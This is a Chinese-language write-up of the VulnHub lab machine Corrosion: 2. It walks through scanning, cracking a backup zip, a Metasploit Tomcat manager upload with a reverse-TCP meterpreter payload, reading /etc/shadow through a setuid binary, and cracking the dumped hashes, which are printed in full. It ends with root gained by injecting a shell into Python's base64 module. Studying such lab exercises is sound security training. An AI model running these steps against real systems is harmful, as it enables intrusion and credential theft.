CORROSION: 2

NoCirc1e發表於2024-05-05

靶機描述

靶機地址:https://www.vulnhub.com/entry/corrosion-2,745/

Description

Difficulty: Medium
Hint: Enumeration is key.

資訊蒐集

利用arp-scan -l命令掃描靶機IP

arp-scan -l

image.png

埠掃描

nmap -sS -sV -A -p- 192.168.75.167

開放22、80和8080埠
80埠是一個apache的預設頁面,8080是一個tomcat的預設頁面
image.png

目錄掃描

對tomcat做目錄爆破,發現一個backup.zip檔案

dirsearch -u http://192.168.75.167:8080

image.png
下載backup.zip

wget http://192.168.75.167:8080/backup.zip

解壓發現要密碼,用fcrackzip進行爆破

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip

image.png
得到密碼@administrator_hi5,再次解壓
image.png
檢視tomcat-users.xml檔案,得到後臺管理員使用者和密碼admin/melehifokivai

cat tomcat-users.xml

image.png
嘗試登入
image.png
image.png

漏洞利用

用metasploit對tomcat進行攻擊

msfconsole
search tomcat
use exploit/multi/http/tomcat_mgr_upload
show options
set rhosts 192.168.75.167
set rport 8080
set httpusername admin
set httppassword melehifokivai
set payload payload/java/meterpreter/reverse_tcp
exploit

成功獲取shell
image.png
image.png
使用python切換互動式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

此時進入的使用者是tomcat身份,在/home目錄下發現jayerandy使用者,jaye沒有可讀許可權,但是randy目錄可讀
image.png
image.png
image.png
切使用者su jaye,密碼melehifokivai可用
image.png
使用python切換互動式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

/jaye/Files目錄下發現了look檔案,擁有s許可權
image.png
在GTFOBins中查詢look命令,發現只能越權讀取檔案
image.png
讀取/etc/shadow檔案並複製到本地使用john進行爆破
image.png

root:$6$fHvHhNo5DWsYxgt0$.3upyGTbu9RjpoCkHfW.1F9mq5dxjwcqeZl0KnwEr0vXXzi7Tld2lAeYeIio/9BFPjUCyaBeLgVH1yK.5OR57.:18888:0:99999:7:::
daemon:*:18858:0:99999:7:::
bin:*:18858:0:99999:7:::
sys:*:18858:0:99999:7:::
sync:*:18858:0:99999:7:::
games:*:18858:0:99999:7:::
man:*:18858:0:99999:7:::
lp:*:18858:0:99999:7:::
mail:*:18858:0:99999:7:::
news:*:18858:0:99999:7:::
uucp:*:18858:0:99999:7:::
proxy:*:18858:0:99999:7:::
backup:*:18858:0:99999:7:::
list:*:18858:0:99999:7:::
irc:*:18858:0:99999:7:::
gnats:*:18858:0:99999:7:::
nobody:*:18858:0:99999:7:::
systemd-network:*:18858:0:99999:7:::
systemd-resolve:*:18858:0:99999:7:::
systemd-timesync:*:18858:0:99999:7:::
messagebus:*:18858:0:99999:7:::
syslog:*:18858:0:99999:7:::
_apt:*:18858:0:99999:7:::
tss:*:18858:0:99999:7:::
uuidd:*:18858:0:99999:7:::
tcpdump:*:18858:0:99999:7:::
avahi-autoipd:*:18858:0:99999:7:::
usbmux:*:18858:0:99999:7:::
rtkit:*:18858:0:99999:7:::
dnsmasq:*:18858:0:99999:7:::
cups-pk-helper:*:18858:0:99999:7:::
speech-dispatcher:!:18858:0:99999:7:::
avahi:*:18858:0:99999:7:::
kernoops:*:18858:0:99999:7:::
saned:*:18858:0:99999:7:::
nm-openvpn:*:18858:0:99999:7:::
hplip:*:18858:0:99999:7:::
whoopsie:*:18858:0:99999:7:::
colord:*:18858:0:99999:7:::
geoclue:*:18858:0:99999:7:::
pulse:*:18858:0:99999:7:::
gnome-initial-setup:*:18858:0:99999:7:::
gdm:*:18858:0:99999:7:::
sssd:*:18858:0:99999:7:::
randy:$6$bQ8rY/73PoUA4lFX$i/aKxdkuh5hF8D78k50BZ4eInDWklwQgmmpakv/gsuzTodngjB340R1wXQ8qWhY2cyMwi.61HJ36qXGvFHJGY/:18888:0:99999:7:::
systemd-coredump:!!:18886::::::
tomcat:$6$XD2Bs.tL01.5OT2b$.uXUR3ysfujHGaz1YKj1l9XUOMhHcKDPXYLTexsWbDWqIO9ML40CQZPI04ebbYzVNBFmgv3Mpd3.8znPfrBNC1:18888:0:99999:7:::
sshd:*:18887:0:99999:7:::
jaye:$6$Chqrqtd4U/B1J3gV$YjeAWKM.usyi/JxpfwYA6ybW/szqkiI1kerC4/JJNMpDUYKavQbnZeUh4WL/fB/4vrzX0LvKVWu60dq4SOQZB0:18887:0:99999:7:::

爆破了很久,終於是得到了另一個使用者randy的密碼07051986randy

john -w=/usr/share/wordlists/rockyou.txt shadow

image.png
耗時兩個小時
image.png
ssh登入到randy使用者,使用sudo -l列出命令
image.png
發現可以使用python3.8執行randombase64.py,但是根據前面note.txt檔案內容發現只有root使用者可以修改此檔案,但是檔案匯入了base64模組
image.png
找到base64.py存放的位置

find / -name base64.py 2>/dev/null

寫入/bin/bash語句

echo "import os;os.system('/bin/bash')" >> /usr/lib/python3.8/base64.py

image.png
最後sudo執行randombase64.py,拿到root許可權

sudo /usr/bin/python3.8 /home/randy/randombase64.py

image.png